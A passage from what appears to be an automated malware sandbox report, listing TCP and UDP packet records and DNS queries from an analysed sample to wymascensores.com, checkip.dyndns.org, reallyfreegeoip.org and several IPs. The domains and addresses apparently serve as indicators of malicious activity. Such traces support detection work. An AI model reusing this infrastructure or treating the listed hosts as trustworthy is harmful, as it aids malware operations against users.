                        Sep 26, 2024 09:58:21.520526886 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.521156073 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586074114 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586150885 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586174965 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586179972 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586211920 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586226940 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586226940 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586232901 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586258888 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586360931 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586415052 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586472988 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586496115 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586502075 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586534977 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586570024 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586651087 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586730957 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586788893 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.586843014 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.586899042 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587018013 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587076902 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587181091 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587408066 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587486029 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587544918 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587718964 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587723017 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587819099 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.587901115 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.587999105 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.588044882 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.588051081 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.588051081 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.588058949 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.588114023 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.607558012 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.607628107 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.607723951 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.607723951 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.607733965 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.649111986 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673012972 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673082113 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673115015 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673121929 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673158884 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673201084 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673201084 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673206091 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673235893 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673367023 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673438072 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673485994 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673540115 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673608065 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673667908 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673825979 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673886061 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.673890114 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673942089 CEST4434973267.212.175.162192.168.2.5
                        Sep 26, 2024 09:58:21.673985004 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:21.680835962 CEST49732443192.168.2.567.212.175.162
                        Sep 26, 2024 09:58:22.732357979 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:22.737279892 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:22.737358093 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:22.737683058 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:22.742453098 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:23.454595089 CEST8049737158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:23.455780983 CEST49739443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:23.455847979 CEST44349739188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:23.455910921 CEST49739443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:23.456191063 CEST49739443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:23.456202984 CEST44349739188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:23.508495092 CEST4973780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:23.940301895 CEST44349739188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:23.948494911 CEST49739443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:23.948538065 CEST44349739188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.088454962 CEST44349739188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.088552952 CEST44349739188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.088615894 CEST49739443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.089149952 CEST49739443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.092468023 CEST4973780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.093584061 CEST4974080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.097620010 CEST8049737158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.097677946 CEST4973780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.098362923 CEST8049740158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.098444939 CEST4974080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.098526955 CEST4974080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.103303909 CEST8049740158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.346460104 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.350236893 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.355015993 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.670777082 CEST8049740158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.672249079 CEST49741443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.672288895 CEST44349741188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.672369003 CEST49741443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.672655106 CEST49741443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.672667027 CEST44349741188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.711641073 CEST4974080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:24.740381956 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:24.774441004 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.774486065 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.774547100 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.778579950 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:24.778592110 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:24.789747953 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.147820950 CEST44349741188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.151298046 CEST49741443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.151348114 CEST44349741188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.282645941 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.282727957 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.284636974 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.284648895 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.284979105 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.300518990 CEST44349741188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.300612926 CEST44349741188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.300865889 CEST49741443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.301166058 CEST49741443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.316276073 CEST4974080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.319236040 CEST4974380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.321489096 CEST8049740158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:25.322360992 CEST4974080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.324178934 CEST8049743158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:25.325871944 CEST4974380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.325973034 CEST4974380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.330792904 CEST8049743158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:25.335166931 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.379396915 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.481858969 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.481962919 CEST44349742188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.482050896 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.485241890 CEST49742443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.488765955 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.493602991 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:25.640572071 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:25.642960072 CEST49744443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.643037081 CEST44349744188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.643196106 CEST49744443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.643731117 CEST49744443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.643747091 CEST44349744188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.696094036 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:25.918742895 CEST8049743158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:25.919922113 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.919984102 CEST44349745188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.920066118 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.920336008 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:25.920350075 CEST44349745188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:25.961623907 CEST4974380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.098566055 CEST44349744188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.106235027 CEST49744443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.106268883 CEST44349744188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.236042023 CEST44349744188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.236166000 CEST44349744188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.236274004 CEST49744443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.244312048 CEST49744443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.393944979 CEST44349745188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.446006060 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.449213982 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.449238062 CEST44349745188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.569719076 CEST44349745188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.569859982 CEST44349745188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:26.569915056 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.570466042 CEST49745443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:26.575217009 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.576170921 CEST4974380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.576513052 CEST4974680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.577563047 CEST4974780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.580418110 CEST8049738158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:26.580468893 CEST4973880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.581132889 CEST8049743158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:26.581181049 CEST4974380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.581325054 CEST8049746158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:26.581383944 CEST4974680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.581479073 CEST4974680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.582406998 CEST8049747158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:26.582470894 CEST4974780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.582603931 CEST4974780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:26.586276054 CEST8049746158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:26.587377071 CEST8049747158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:27.152457952 CEST8049746158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:27.153986931 CEST49748443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.154045105 CEST44349748188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.154303074 CEST49748443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.154520035 CEST49748443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.154532909 CEST44349748188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.170015097 CEST8049747158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:27.171500921 CEST49749443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.171596050 CEST44349749188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.171690941 CEST49749443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.171936989 CEST49749443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.171976089 CEST44349749188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.196006060 CEST4974680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:27.211639881 CEST4974780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:27.613179922 CEST44349748188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.615012884 CEST49748443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.615052938 CEST44349748188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.659101009 CEST44349749188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.660818100 CEST49749443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.660921097 CEST44349749188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.754396915 CEST44349748188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.754514933 CEST44349748188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.754600048 CEST49748443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.755055904 CEST49748443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.759732008 CEST4975080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:27.764647961 CEST8049750158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:27.764735937 CEST4975080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:27.764898062 CEST4975080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:27.769661903 CEST8049750158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:27.806148052 CEST44349749188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.806247950 CEST44349749188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:27.806314945 CEST49749443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:27.806785107 CEST49749443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:29.895591021 CEST8049750158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:29.897099972 CEST49751443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:29.897170067 CEST44349751188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:29.897272110 CEST49751443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:29.897542000 CEST49751443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:29.897552967 CEST44349751188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:29.946042061 CEST4975080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:30.373653889 CEST44349751188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:30.375472069 CEST49751443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:30.375505924 CEST44349751188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:30.526035070 CEST44349751188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:30.526143074 CEST44349751188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:30.526240110 CEST49751443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:30.526823997 CEST49751443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:30.530284882 CEST4975080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:30.531416893 CEST4975280192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:30.535439014 CEST8049750158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:30.535530090 CEST4975080192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:30.536540031 CEST8049752158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:30.536616087 CEST4975280192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:30.536752939 CEST4975280192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:30.541496038 CEST8049752158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:32.669946909 CEST8049752158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:32.671380043 CEST49753443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:32.671432018 CEST44349753188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:32.671503067 CEST49753443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:32.671762943 CEST49753443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:32.671772003 CEST44349753188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:32.711808920 CEST4975280192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:33.127532005 CEST44349753188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:33.129343987 CEST49753443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:33.129364014 CEST44349753188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:33.252836943 CEST44349753188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:33.252954006 CEST44349753188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:33.253036022 CEST49753443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:33.253628969 CEST49753443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:33.257158041 CEST4975280192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:33.257755995 CEST4975480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:33.262218952 CEST8049752158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:33.262293100 CEST4975280192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:33.262552023 CEST8049754158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:33.262614965 CEST4975480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:33.262712955 CEST4975480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:33.267461061 CEST8049754158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:35.562149048 CEST8049754158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:35.602298021 CEST4975480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:35.614936113 CEST49755443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:35.614972115 CEST44349755188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:35.615031958 CEST49755443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:35.615614891 CEST49755443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:35.615631104 CEST44349755188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:36.069892883 CEST44349755188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:36.071594954 CEST49755443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:36.071614981 CEST44349755188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:36.205027103 CEST44349755188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:36.205127001 CEST44349755188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:36.205207109 CEST49755443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:36.205686092 CEST49755443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:36.208901882 CEST4975480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:36.210047960 CEST4975680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:36.214041948 CEST8049754158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:36.214118958 CEST4975480192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:36.214828968 CEST8049756158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:36.214899063 CEST4975680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:36.215033054 CEST4975680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:36.219796896 CEST8049756158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:38.266191006 CEST8049756158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:38.277554989 CEST49757443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:38.277617931 CEST44349757188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:38.277690887 CEST49757443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:38.281286955 CEST49757443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:38.281301975 CEST44349757188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:38.322668076 CEST4975680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:38.816168070 CEST44349757188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:38.817950010 CEST49757443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:38.818042994 CEST44349757188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:38.967288017 CEST44349757188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:38.967447996 CEST44349757188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:38.967516899 CEST49757443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:38.968005896 CEST49757443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:38.971283913 CEST4975680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:38.972608089 CEST4975880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:38.976397991 CEST8049756158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:38.976475000 CEST4975680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:38.977435112 CEST8049758158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:38.977530956 CEST4975880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:38.977634907 CEST4975880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:38.982429028 CEST8049758158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:41.241326094 CEST8049758158.101.44.242192.168.2.5
                        Sep 26, 2024 09:58:41.243165970 CEST49759443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:41.243227005 CEST44349759188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:41.243330002 CEST49759443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:41.243640900 CEST49759443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:41.243660927 CEST44349759188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:41.289796114 CEST4975880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:58:41.697129011 CEST44349759188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:41.699028015 CEST49759443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:41.699055910 CEST44349759188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:41.833215952 CEST44349759188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:41.833456039 CEST44349759188.114.96.3192.168.2.5
                        Sep 26, 2024 09:58:41.833904028 CEST49759443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:58:41.834506035 CEST49759443192.168.2.5188.114.96.3
                        Sep 26, 2024 09:59:11.893856049 CEST8049708158.101.44.242192.168.2.5
                        Sep 26, 2024 09:59:11.893950939 CEST4970880192.168.2.5158.101.44.242
                        Sep 26, 2024 09:59:24.341203928 CEST8049729158.101.44.242192.168.2.5
                        Sep 26, 2024 09:59:24.341320992 CEST4972980192.168.2.5158.101.44.242
                        Sep 26, 2024 09:59:25.511392117 CEST8049733158.101.44.242192.168.2.5
                        Sep 26, 2024 09:59:25.511456013 CEST4973380192.168.2.5158.101.44.242
                        Sep 26, 2024 09:59:32.153072119 CEST8049746158.101.44.242192.168.2.5
                        Sep 26, 2024 09:59:32.153193951 CEST4974680192.168.2.5158.101.44.242
                        Sep 26, 2024 09:59:32.169955015 CEST8049747158.101.44.242192.168.2.5
                        Sep 26, 2024 09:59:32.170013905 CEST4974780192.168.2.5158.101.44.242
                        Sep 26, 2024 09:59:46.241079092 CEST8049758158.101.44.242192.168.2.5
                        Sep 26, 2024 09:59:46.241148949 CEST4975880192.168.2.5158.101.44.242
                        Sep 26, 2024 10:00:00.524784088 CEST4973380192.168.2.5158.101.44.242
                        Sep 26, 2024 10:00:00.529719114 CEST8049733158.101.44.242192.168.2.5
                        Sep 26, 2024 10:00:07.180660009 CEST4974780192.168.2.5158.101.44.242
                        Sep 26, 2024 10:00:07.185641050 CEST8049747158.101.44.242192.168.2.5
                        Sep 26, 2024 10:00:21.243086100 CEST4975880192.168.2.5158.101.44.242
                        Sep 26, 2024 10:00:21.248061895 CEST8049758158.101.44.242192.168.2.5

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Sep 26, 2024 09:57:58.250614882 CEST5721353192.168.2.51.1.1.1
                        Sep 26, 2024 09:57:58.490430117 CEST53572131.1.1.1192.168.2.5
                        Sep 26, 2024 09:58:01.792212009 CEST4935553192.168.2.51.1.1.1
                        Sep 26, 2024 09:58:01.799412966 CEST53493551.1.1.1192.168.2.5
                        Sep 26, 2024 09:58:03.014956951 CEST6373753192.168.2.51.1.1.1
                        Sep 26, 2024 09:58:03.022213936 CEST53637371.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Sep 26, 2024 09:57:58.250614882 CEST192.168.2.51.1.1.10xb207Standard query (0)wymascensores.comA (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:01.792212009 CEST192.168.2.51.1.1.10xde13Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                        Sep 26, 2024 09:58:03.014956951 CEST192.168.2.51.1.1.10x8260Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                        DNS Answers

